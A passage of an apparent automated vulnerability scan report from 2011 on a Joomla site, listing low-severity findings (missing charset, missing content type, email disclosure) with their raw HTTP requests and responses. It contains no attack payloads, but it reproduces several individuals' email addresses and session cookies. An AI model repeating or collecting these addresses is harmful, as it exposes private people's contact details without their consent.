Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 05 Jan 2011 03:43:32 GMT
MS-Author-Via: DAV
Connection: close
Content-Type: application/rss+xml; charset=utf-8
Content-Length: 4596

<?xml version="1.0" encoding="utf-8"?>
<!-- generator="Joomla! 1.5 - Open Source Content Management" -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
   <channel>
       <title>Welcome to KLC
...[SNIP]...
<author>shuang@klcnetworks.com (Administrator)</author>
...[SNIP]...

5.3. http://www.services.klcnetworks.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.services.klcnetworks.com
Path:   /index.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /index.php?option=com_content&view=category&id=39&Itemid=59&format=feed&type=rss HTTP/1.1
Host: www.services.klcnetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: 75463e7328b8eda0e9080729819d87e5=mo2ai0p1o8b4eghpl6epgdoa62; ja_purity_tpl=ja_purity;

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 03:24:08 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 05 Jan 2011 03:24:08 GMT
Connection: close
Content-Type: application/rss+xml; charset=utf-8
Content-Length: 42642

<?xml version="1.0" encoding="utf-8"?>
<!-- generator="Joomla! 1.5 - Open Source Content Management" -->
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
   <channel>
       <title>KLC Seaport-e
...[SNIP]...
<span id="detailsView_lblPastPerformance"> maeve.myers@fns.usda.gov</span>
...[SNIP]...
<a href="http://mce_host/jkuo@acusysinc.com">
...[SNIP]...
<author>shuang@klcnetworks.com (Administrator)</author>
...[SNIP]...
<a href="mailto:egaluzzo@mainstay-ent.com">
...[SNIP]...
<span id="detailsView_lblEpoc1Email">galuzzo@mainstay-ent.com</span>
...[SNIP]...
<author>shuang@klcnetworks.com (Administrator)</author>
...[SNIP]...
<a href="mailto:ejansen@independentsoftware.com"><span id="detailsView_lblEpoc1Email">ejansen@independentsoftware.com</span>
...[SNIP]...
<author>shuang@klcnetworks.com (Administrator)</author>
...[SNIP]...
<a href="mailto:shuang@klcnetworks.com"><span id="detailsView_lblEpoc1Email">daxing.chen@ckaonline.com</span>
...[SNIP]...
<author>shuang@klcnetworks.com (Administrator)</author>
...[SNIP]...
<a href="mailto:shuang@klcnetworks.com">shuang@klcnetworks.com</a>
...[SNIP]...
<author>shuang@klcnetworks.com (Administrator)</author>
...[SNIP]...
<a href="mailto:douwerkerk@igs-fl.com">douwerkerk@igs-fl.com</a>
...[SNIP]...
<author>shuang@klcnetworks.com (Administrator)</author>
...[SNIP]...
<a href="mailto:victoria@daxtechnologies.com">victoria@daxtechnologies.com</a>
...[SNIP]...
<author>shuang@klcnetworks.com (Administrator)</author>
...[SNIP]...
<a href="mailto:bchristiano@bcengineeringanddesign.com">bchristiano@bcengineeringanddesign.com</a>
...[SNIP]...
<author>shuang@klcnetworks.com (Administrator)</author>
...[SNIP]...
<a href="mailto:adheisig@carlottasciences.com">adheisig@carlottasciences.com</a>
...[SNIP]...
<author>shuang@klcnetworks.com (Administrator)</author>
...[SNIP]...

6. HTML does not specify charset  previous  next
There are 23 instances of this issue:

Issue description

If a web response states that it contains HTML content but does not specify a character set, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


6.1. http://www.klcnetworks.com/components/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.klcnetworks.com
Path:   /components/

Request

GET /components/ HTTP/1.1
Referer: http://www.klcnetworks.com/components/com_poll/assets/poll_bars.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.klcnetworks.com
Cookie: 75463e7328b8eda0e9080729819d87e5=92mjsg59tguve95uspfctqquq5; ja_purity_tpl=ja_purity
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 02:57:46 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 17:44:36 GMT
ETag: "9808d2e-2f-4778f2a076900"
Accept-Ranges: bytes
Vary: Accept-Encoding
MS-Author-Via: DAV
Content-Type: text/html
Content-Length: 47

<html>
<body bgcolor="#FFFFFF">
</body>
</html>

6.2. http://www.klcnetworks.com/components/com_poll/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.klcnetworks.com
Path:   /components/com_poll/

Request

GET /components/com_poll/ HTTP/1.1
Referer: http://www.klcnetworks.com/components/com_poll/assets/poll_bars.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.klcnetworks.com
Cookie: 75463e7328b8eda0e9080729819d87e5=92mjsg59tguve95uspfctqquq5; ja_purity_tpl=ja_purity
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 02:57:45 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 17:44:42 GMT
ETag: "980a28e-2c-4778f2a62f680"
Accept-Ranges: bytes
Vary: Accept-Encoding
MS-Author-Via: DAV
Content-Type: text/html
Content-Length: 44

<html><body bgcolor="#FFFFFF"></body></html>

6.3. http://www.klcnetworks.com/components/com_poll/assets/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.klcnetworks.com
Path:   /components/com_poll/assets/

Request

GET /components/com_poll/assets/ HTTP/1.1
Referer: http://www.klcnetworks.com/components/com_poll/assets/poll_bars.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.klcnetworks.com
Cookie: 75463e7328b8eda0e9080729819d87e5=92mjsg59tguve95uspfctqquq5; ja_purity_tpl=ja_purity
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 02:57:45 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 17:44:42 GMT
ETag: "980a292-2c-4778f2a62f680"
Accept-Ranges: bytes
Vary: Accept-Encoding
MS-Author-Via: DAV
Content-Type: text/html
Content-Length: 44

<html><body bgcolor="#FFFFFF"></body></html>

6.4. http://www.klcnetworks.com/images/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.klcnetworks.com
Path:   /images/

Request

GET /images/ HTTP/1.1
Referer: http://www.klcnetworks.com/images/stories/klc_images/klcservices.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.klcnetworks.com
Cookie: 75463e7328b8eda0e9080729819d87e5=92mjsg59tguve95uspfctqquq5; ja_purity_tpl=ja_purity
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 02:57:37 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 17:44:45 GMT
ETag: "980a335-2c-4778f2a90bd40"
Accept-Ranges: bytes
Vary: Accept-Encoding
MS-Author-Via: DAV
Content-Type: text/html
Content-Length: 44

<html><body bgcolor="#FFFFFF"></body></html>

6.5. http://www.klcnetworks.com/images/M_images/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.klcnetworks.com
Path:   /images/M_images/

Request

GET /images/M_images/ HTTP/1.1
Referer: http://www.klcnetworks.com/images/M_images/livemarks.png
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.klcnetworks.com
Cookie: 75463e7328b8eda0e9080729819d87e5=92mjsg59tguve95uspfctqquq5; ja_purity_tpl=ja_purity
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 02:57:37 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 17:44:45 GMT
ETag: "980a355-2f-4778f2a90bd40"
Accept-Ranges: bytes
Vary: Accept-Encoding
MS-Author-Via: DAV
Content-Type: text/html
Content-Length: 47

<html>
<body bgcolor="#FFFFFF">
</body>
</html>

6.6. http://www.klcnetworks.com/images/stories/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.klcnetworks.com
Path:   /images/stories/

Request

GET /images/stories/ HTTP/1.1
Referer: http://www.klcnetworks.com/images/stories/klc_images/klcservices.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.klcnetworks.com
Cookie: 75463e7328b8eda0e9080729819d87e5=92mjsg59tguve95uspfctqquq5; ja_purity_tpl=ja_purity
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 02:57:37 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 17:44:45 GMT
ETag: "980a376-2f-4778f2a90bd40"
Accept-Ranges: bytes
Vary: Accept-Encoding
MS-Author-Via: DAV
Content-Type: text/html
Content-Length: 47

<html>
<body bgcolor="#FFFFFF">
</body>
</html>

6.7. http://www.klcnetworks.com/images/stories/klc_images/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.klcnetworks.com
Path:   /images/stories/klc_images/

Request

GET /images/stories/klc_images/ HTTP/1.1
Referer: http://www.klcnetworks.com/images/stories/klc_images/klcservices.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.klcnetworks.com
Cookie: 75463e7328b8eda0e9080729819d87e5=92mjsg59tguve95uspfctqquq5; ja_purity_tpl=ja_purity
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 02:57:37 GMT
Server: Apache
Last-Modified: Thu, 25 Mar 2010 19:39:02 GMT
ETag: "980a387-2f-482a532e62180"
Accept-Ranges: bytes
Vary: Accept-Encoding
MS-Author-Via: DAV
Content-Type: text/html
Content-Length: 47

<html>
<body bgcolor="#FFFFFF">
</body>
</html>

6.8. http://www.klcnetworks.com/media/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.klcnetworks.com
Path:   /media/

Request

GET /media/ HTTP/1.1
Referer: http://www.klcnetworks.com/media/system/js/mootools.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.klcnetworks.com
Cookie: 75463e7328b8eda0e9080729819d87e5=92mjsg59tguve95uspfctqquq5; ja_purity_tpl=ja_purity
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 02:57:36 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 17:45:18 GMT
ETag: "980a657-2c-4778f2c884780"
Accept-Ranges: bytes
Vary: Accept-Encoding
MS-Author-Via: DAV
Content-Type: text/html
Content-Length: 44

<html><body bgcolor="#FFFFFF"></body></html>

6.9. http://www.klcnetworks.com/media/system/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.klcnetworks.com
Path:   /media/system/

Request

GET /media/system/ HTTP/1.1
Referer: http://www.klcnetworks.com/media/system/js/mootools.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.klcnetworks.com
Cookie: 75463e7328b8eda0e9080729819d87e5=92mjsg59tguve95uspfctqquq5; ja_purity_tpl=ja_purity
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 02:57:37 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 17:45:18 GMT
ETag: "980a658-2c-4778f2c884780"
Accept-Ranges: bytes
Vary: Accept-Encoding
MS-Author-Via: DAV
Content-Type: text/html
Content-Length: 44

<html><body bgcolor="#FFFFFF"></body></html>

6.10. http://www.klcnetworks.com/media/system/js/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.klcnetworks.com
Path:   /media/system/js/

Request

GET /media/system/js/ HTTP/1.1
Referer: http://www.klcnetworks.com/media/system/js/mootools.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.klcnetworks.com
Cookie: 75463e7328b8eda0e9080729819d87e5=92mjsg59tguve95uspfctqquq5; ja_purity_tpl=ja_purity
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 02:57:36 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 17:45:19 GMT
ETag: "980a666-2c-4778f2c9789c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
MS-Author-Via: DAV
Content-Type: text/html
Content-Length: 44

<html><body bgcolor="#FFFFFF"></body></html>

6.11. http://www.klcnetworks.com/templates/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.klcnetworks.com
Path:   /templates/

Request

GET /templates/ HTTP/1.1
Referer: http://www.klcnetworks.com/templates/ja_purity/favicon.ico
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.klcnetworks.com
Cookie: 75463e7328b8eda0e9080729819d87e5=92mjsg59tguve95uspfctqquq5; ja_purity_tpl=ja_purity
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 02:57:37 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 17:45:36 GMT
ETag: "980aa51-2c-4778f2d9af000"
Accept-Ranges: bytes
Vary: Accept-Encoding
MS-Author-Via: DAV
Content-Type: text/html
Content-Length: 44

<html><body bgcolor="#FFFFFF"></body></html>

6.12. http://www.klcnetworks.com/templates/ja_purity/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.klcnetworks.com
Path:   /templates/ja_purity/

Request

GET /templates/ja_purity/ HTTP/1.1
Referer: http://www.klcnetworks.com/templates/ja_purity/favicon.ico
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.klcnetworks.com
Cookie: 75463e7328b8eda0e9080729819d87e5=92mjsg59tguve95uspfctqquq5; ja_purity_tpl=ja_purity
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 02:57:36 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 17:45:38 GMT
ETag: "980aad7-2c-4778f2db97480"
Accept-Ranges: bytes
Vary: Accept-Encoding
MS-Author-Via: DAV
Content-Type: text/html
Content-Length: 44

<html><body bgcolor="#FFFFFF"></body></html>

6.13. http://www.klcnetworks.com/templates/ja_purity/css/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.klcnetworks.com
Path:   /templates/ja_purity/css/

Request

GET /templates/ja_purity/css/ HTTP/1.1
Referer: http://www.klcnetworks.com/templates/ja_purity/css/template.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.klcnetworks.com
Cookie: 75463e7328b8eda0e9080729819d87e5=92mjsg59tguve95uspfctqquq5; ja_purity_tpl=ja_purity
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 02:57:37 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 17:45:40 GMT
ETag: "980aade-2c-4778f2dd7f900"
Accept-Ranges: bytes
Vary: Accept-Encoding
MS-Author-Via: DAV
Content-Type: text/html
Content-Length: 44

<html><body bgcolor="#FFFFFF"></body></html>

6.14. http://www.klcnetworks.com/templates/ja_purity/images/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.klcnetworks.com
Path:   /templates/ja_purity/images/

Request

GET /templates/ja_purity/images/ HTTP/1.1
Referer: http://www.klcnetworks.com/templates/ja_purity/images/user-increase.png
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.klcnetworks.com
Cookie: 75463e7328b8eda0e9080729819d87e5=92mjsg59tguve95uspfctqquq5; ja_purity_tpl=ja_purity
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 02:57:37 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 17:45:41 GMT
ETag: "980ab49-2c-4778f2de73b40"
Accept-Ranges: bytes
Vary: Accept-Encoding
MS-Author-Via: DAV
Content-Type: text/html
Content-Length: 44

<html><body bgcolor="#FFFFFF"></body></html>

6.15. http://www.klcnetworks.com/templates/ja_purity/styles/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.klcnetworks.com
Path:   /templates/ja_purity/styles/

Request

GET /templates/ja_purity/styles/ HTTP/1.1
Referer: http://www.klcnetworks.com/templates/ja_purity/styles/header/green/style.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.klcnetworks.com
Cookie: 75463e7328b8eda0e9080729819d87e5=92mjsg59tguve95uspfctqquq5; ja_purity_tpl=ja_purity
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 02:57:37 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 17:45:38 GMT
ETag: "980ab8d-2c-4778f2db97480"
Accept-Ranges: bytes
Vary: Accept-Encoding
MS-Author-Via: DAV
Content-Type: text/html
Content-Length: 44

<html><body bgcolor="#FFFFFF"></body></html>

6.16. http://www.klcnetworks.com/templates/ja_purity/styles/background/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.klcnetworks.com
Path:   /templates/ja_purity/styles/background/

Request

GET /templates/ja_purity/styles/background/ HTTP/1.1
Referer: http://www.klcnetworks.com/templates/ja_purity/styles/background/purewhite/style.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.klcnetworks.com
Cookie: 75463e7328b8eda0e9080729819d87e5=92mjsg59tguve95uspfctqquq5; ja_purity_tpl=ja_purity
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 02:57:37 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 17:45:39 GMT
ETag: "980ab8e-2c-4778f2dc8b6c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
MS-Author-Via: DAV
Content-Type: text/html
Content-Length: 44

<html><body bgcolor="#FFFFFF"></body></html>

6.17. http://www.klcnetworks.com/templates/ja_purity/styles/background/purewhite/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.klcnetworks.com
Path:   /templates/ja_purity/styles/background/purewhite/

Request

GET /templates/ja_purity/styles/background/purewhite/ HTTP/1.1
Referer: http://www.klcnetworks.com/templates/ja_purity/styles/background/purewhite/style.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.klcnetworks.com
Cookie: 75463e7328b8eda0e9080729819d87e5=92mjsg59tguve95uspfctqquq5; ja_purity_tpl=ja_purity
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 02:57:37 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 17:45:39 GMT
ETag: "980abc8-2c-4778f2dc8b6c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
MS-Author-Via: DAV
Content-Type: text/html
Content-Length: 44

<html><body bgcolor="#FFFFFF"></body></html>

6.18. http://www.klcnetworks.com/templates/ja_purity/styles/elements/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.klcnetworks.com
Path:   /templates/ja_purity/styles/elements/

Request

GET /templates/ja_purity/styles/elements/ HTTP/1.1
Referer: http://www.klcnetworks.com/templates/ja_purity/styles/elements/black/style.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.klcnetworks.com
Cookie: 75463e7328b8eda0e9080729819d87e5=92mjsg59tguve95uspfctqquq5; ja_purity_tpl=ja_purity
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 02:57:37 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 17:45:38 GMT
ETag: "980ac02-2c-4778f2db97480"
Accept-Ranges: bytes
Vary: Accept-Encoding
MS-Author-Via: DAV
Content-Type: text/html
Content-Length: 44

<html><body bgcolor="#FFFFFF"></body></html>

6.19. http://www.klcnetworks.com/templates/ja_purity/styles/elements/black/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.klcnetworks.com
Path:   /templates/ja_purity/styles/elements/black/

Request

GET /templates/ja_purity/styles/elements/black/ HTTP/1.1
Referer: http://www.klcnetworks.com/templates/ja_purity/styles/elements/black/style.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.klcnetworks.com
Cookie: 75463e7328b8eda0e9080729819d87e5=92mjsg59tguve95uspfctqquq5; ja_purity_tpl=ja_purity
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 02:57:37 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 17:45:39 GMT
ETag: "980ac03-2c-4778f2dc8b6c0"
Accept-Ranges: bytes
Vary: Accept-Encoding
MS-Author-Via: DAV
Content-Type: text/html
Content-Length: 44

<html><body bgcolor="#FFFFFF"></body></html>

6.20. http://www.klcnetworks.com/templates/ja_purity/styles/header/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.klcnetworks.com
Path:   /templates/ja_purity/styles/header/

Request

GET /templates/ja_purity/styles/header/ HTTP/1.1
Referer: http://www.klcnetworks.com/templates/ja_purity/styles/header/green/style.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.klcnetworks.com
Cookie: 75463e7328b8eda0e9080729819d87e5=92mjsg59tguve95uspfctqquq5; ja_purity_tpl=ja_purity
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 02:57:36 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 17:45:38 GMT
ETag: "980ac0e-2c-4778f2db97480"
Accept-Ranges: bytes
Vary: Accept-Encoding
MS-Author-Via: DAV
Content-Type: text/html
Content-Length: 44

<html><body bgcolor="#FFFFFF"></body></html>

6.21. http://www.klcnetworks.com/templates/ja_purity/styles/header/green/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.klcnetworks.com
Path:   /templates/ja_purity/styles/header/green/

Request

GET /templates/ja_purity/styles/header/green/ HTTP/1.1
Referer: http://www.klcnetworks.com/templates/ja_purity/styles/header/green/style.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.klcnetworks.com
Cookie: 75463e7328b8eda0e9080729819d87e5=92mjsg59tguve95uspfctqquq5; ja_purity_tpl=ja_purity
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 02:57:37 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 17:45:38 GMT
ETag: "980ac16-2c-4778f2db97480"
Accept-Ranges: bytes
Vary: Accept-Encoding
MS-Author-Via: DAV
Content-Type: text/html
Content-Length: 44

<html><body bgcolor="#FFFFFF"></body></html>

6.22. http://www.klcnetworks.com/templates/system/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.klcnetworks.com
Path:   /templates/system/

Request

GET /templates/system/ HTTP/1.1
Referer: http://www.klcnetworks.com/templates/system/css/system.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.klcnetworks.com
Cookie: 75463e7328b8eda0e9080729819d87e5=92mjsg59tguve95uspfctqquq5; ja_purity_tpl=ja_purity
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 02:57:36 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 17:45:36 GMT
ETag: "980aca8-2c-4778f2d9af000"
Accept-Ranges: bytes
Vary: Accept-Encoding
MS-Author-Via: DAV
Content-Type: text/html
Content-Length: 44

<html><body bgcolor="#FFFFFF"></body></html>

6.23. http://www.klcnetworks.com/templates/system/css/  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.klcnetworks.com
Path:   /templates/system/css/

Request

GET /templates/system/css/ HTTP/1.1
Referer: http://www.klcnetworks.com/templates/system/css/system.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.klcnetworks.com
Cookie: 75463e7328b8eda0e9080729819d87e5=92mjsg59tguve95uspfctqquq5; ja_purity_tpl=ja_purity
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 05 Jan 2011 02:57:37 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 17:45:37 GMT
ETag: "980acaf-2c-4778f2daa3240"
Accept-Ranges: bytes
Vary: Accept-Encoding
MS-Author-Via: DAV
Content-Type: text/html
Content-Length: 44

<html><body bgcolor="#FFFFFF"></body></html>

7. Content type is not specified  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.klcnetworks.com
Path:   /index.php

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

POST /index.php HTTP/1.1
Referer: http://www.klcnetworks.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.klcnetworks.com
Cookie: 75463e7328b8eda0e9080729819d87e5=92mjsg59tguve95uspfctqquq5; ja_purity_tpl=ja_purity
Expect: 100-continue
Accept-Encoding: gzip, deflate
Content-Length: 59

Itemid=1&option=com_search&searchword=search...&task=search

Response

HTTP/1.1 100 Continue

HTTP/1.1 301 Moved Permanently
Date: Wed, 05 Jan 2011 02:57:40 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Location: http://www.klcnetworks.com/index.php?searchword=
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Wed Jan 05 07:32:36 CST 2011.